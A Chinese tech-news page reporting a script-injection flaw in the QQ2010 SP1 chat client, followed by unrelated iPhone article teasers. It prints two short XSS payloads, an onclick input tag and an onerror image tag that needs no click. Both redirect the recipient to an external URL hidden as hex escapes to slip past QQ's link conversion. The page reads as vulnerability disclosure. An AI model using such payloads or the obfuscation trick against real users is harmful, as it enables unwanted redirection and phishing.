品味昵称网腾讯QQ2010SP1正式版惊现低级漏洞
腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。用户可以随意在消息中使用Javascript、Html,腾讯并没有对此进行有效的屏蔽,如此低级漏洞,在QQ这样的软件中出现实属罕见。
截止发稿之日起,腾讯还没有对此漏洞给出解决办法,网友只有去下载试用QQ2010正式版来避免此问题。
点击下载:QQ2010SP1正式版
首先囧一下:脚本出错还会提示错误
1、消息记录的Javascript、Html标签没有屏蔽
2、消息盒子Javascript、Html标签没有屏蔽
3、小实验
1、发送代码:<input onclick="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
因为腾讯会自动将url转换,我们必须混淆url才能发送
4、超牛代码
<img src=’tetet’ onerror="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
因为要点击才能触发,想到一个不用点击就能触发的代码。
5、希望腾讯快点修复,这个漏洞非同小可
6、本漏洞由TGL发现。
![iPhone备忘录可以加密吗?iPhone备忘录密码忘了怎么打开被锁文件?]( "iPhone备忘录可以加密吗?iPhone备忘录密码忘了怎么打开被锁文件?")
iPhone备忘录可以加密吗?iPhone备忘录密码忘了怎么打开被锁文件?
iPhone这款手机功能还是很多的,特别是备忘录有很多实用的功能,而且还可以加密,隐私功能还是不错的,那大家知道忘了密码之后怎么去打开吗?下面就和小编一起来看看吧。iPhone备忘录可以加密吗?可以加密的,下面看一下最新的加密的方法:注意小编使用的是ios16以上的系统。1...
![iPhone14Pro支持多少w快充?iPhone14Pro支持无线充电吗?]( "iPhone14Pro支持多少w快充?iPhone14Pro支持无线充电吗?")
iPhone14Pro支持多少w快充?iPhone14Pro支持无线充电吗?
近日紫色的iPhone14Pro曝光吸引了不少网友的关注,与此同时iPhone14Pro快充问题也让不少网友们牵挂。那么这次iPhone14Pro支持多少w快充呢?是否可以无线充电呢?下面一起来看看吧!iPhone14Pro支持多少w快充?最近有博主爆料称iPhone14Pro或支持30W充电,iPhone为人诟病的...
![iPhone14灵动岛宠物怎么设置?苹果灵动岛宠物怎么弄教程]( "iPhone14灵动岛宠物怎么设置?苹果灵动岛宠物怎么弄教程")
iPhone14灵动岛宠物怎么设置?苹果灵动岛宠物怎么弄教程
这次苹果发布全新的iPhone14系列最吸引人的就是灵动岛的设计了,虽说很鸡肋,但是可以在岛上玩宠物还是很酷炫的,下面就和小编一起来看看iPhone14灵动岛宠物设置教程。苹果灵动岛宠物怎么弄教程国内还没有适配的APP,大家可以期待一下。国外有开发者出了新appApollo,实...
![iOS16电池健康度严重下降怎么办?iOS16怎么设置电量百分比?]( "iOS16电池健康度严重下降怎么办?iOS16怎么设置电量百分比?")
iOS16电池健康度严重下降怎么办?iOS16怎么设置电量百分比?
在升级了iOS16系统后不少用户发现iPhone手机发热严重,于此通知电池健康度严重下降,不足的电池电量百分比让人感到非常的恐慌,十分没有安全感!那么遇到这样的问题要怎么解决呢?来看看吧!iOS16电池健康度严重下降怎么办?iPhone升级到iOS16导致电池健康度严重下降可能是...
相关文章
- 腾讯QQ2010正式版SP3下载 QQ会员优先体验
- 腾讯qq2014 Beta体验版月底内测 SP5正式版下载发布
- 腾讯qq2013正式版SP5诚邀您体验 群视频聊天新增教育模式
- 腾讯qq2013正式版SP4全员发布了 版本号为8796
- QQ2010正式版SP1发布 QQ现在集成了浏览器窗口
- QQ2010SP1正式版功能介绍 qq2010正式版SP1官方下载
- 腾讯QQ2010正式版SP3.1优先体验 我的QQ我做主
- 腾讯qq2013正式版sp4诚邀您体验 文件转发功能升级
- 2011年腾讯QQ最新版本发布 QQ2010正式版SP3.1下载
- QQ2010正式版SP2.1 简体版全新体验 QQ2010正式版SP2.1官方下载